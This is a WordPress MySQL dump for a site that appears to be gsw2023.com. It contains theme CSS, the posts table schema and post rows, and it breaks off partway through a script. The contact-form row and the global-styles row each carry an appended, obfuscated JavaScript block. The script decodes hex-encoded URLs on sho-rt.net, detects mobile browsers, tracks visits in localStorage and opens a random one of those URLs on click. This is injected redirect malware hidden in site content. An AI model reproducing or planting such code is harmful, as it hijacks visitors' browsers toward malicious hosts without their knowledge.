#page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}');
/*!40000 ALTER TABLE `dnctiavkr_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_posts`
--

DROP TABLE IF EXISTS `dnctiavkr_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=5503 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_posts`
--

LOCK TABLES `dnctiavkr_posts` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_posts` DISABLE KEYS */;
INSERT INTO `dnctiavkr_posts` VALUES
(6,1,'2022-10-03 21:34:45','2022-10-03 21:34:45','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@gsw2023.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[_site_admin_email]\nReply-To: [your-email]\n\n0\n0\n\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@gsw2023.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[your-email]\nReply-To: [_site_admin_email]\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nPlease fill out this field.\nThis field has a too long input.\nThis field has a too short input.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe uploaded file is too large.\nThere was an error uploading the file.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact form 1','','publish','closed','closed','','contact-form-1','','','2022-10-03 21:34:45','2022-10-03 21:34:45','',0,'https://gsw2023.com/?post_type=wpcf7_contact_form&p=6',0,'wpcf7_contact_form','',0),
(7,1,'2022-10-03 21:35:44','2022-10-03 21:35:44','','Default Kit','','publish','closed','closed','','default-kit','','','2022-10-05 17:28:18','2022-10-05 17:28:18','',0,'https://gsw2023.com/?p=7',0,'elementor_library','',0),
(21,1,'2022-10-03 21:46:31','2022-10-03 21:46:31','','Donation Form','','publish','closed','closed','','donation-form','','','2022-10-03 21:46:31','2022-10-03 21:46:31','',0,'https://gsw2023.com/index.php/donations/donation-form/',0,'give_forms','',0),
(25,1,'2022-10-03 23:06:31','2022-10-03 23:06:31','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| 